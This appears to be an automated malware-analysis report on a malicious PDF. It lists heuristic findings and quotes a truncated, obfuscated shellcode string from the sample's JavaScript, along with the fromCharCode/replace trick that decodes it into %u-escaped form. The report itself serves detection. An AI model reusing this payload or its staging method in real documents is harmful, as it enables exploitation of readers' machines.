MALICIOUS
114
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9993
Heuristics 3
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var forme1 = "@2deb@8358@04c0@c933@088b@9090@3390@33f6@8bff@83f0@0cc6@fe8b@3366@66d2@168b@d632@1788@c683@8302@01c7@e983@e301@eb17@e8e9@ffce@ffff@9090@9090@f3e5@0003@9090@9090@9090@9090@6c39@57dc@b75b@4fce@7b97@7878@c6ce@8d8d@7777@3b5f@b415@3000@0505@f8f8@a5a5@4dc6@5919@030f@5ad1@7505@263a@63ce@a62d@5a1a@8088@b831@7f3a@22de@6ce7@7bab@43c8@f8ba@2814@77fc@1448@f3f1@7b03@3734@9248@a42d@174a@758d@fa71@e7ac@c6de@e76c@3b60@ccec@eeed@2af0@2a63@fe75@3e0a@e66d@b9ba@4c39@6a96@dd65@1c5b@eb8e@d5a1@7323@9da4@ … var asT = String.fromCharCode(37,117); var forme2 = forme1.replace(/@/g,asT); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
font_00_sfnt_off00001195.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x1195 | 192384 bytes |
SHA-256: 3e4aed60bc9e462c84d567e086edabb09be4a4ad6823a0740eaad335e09493af |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.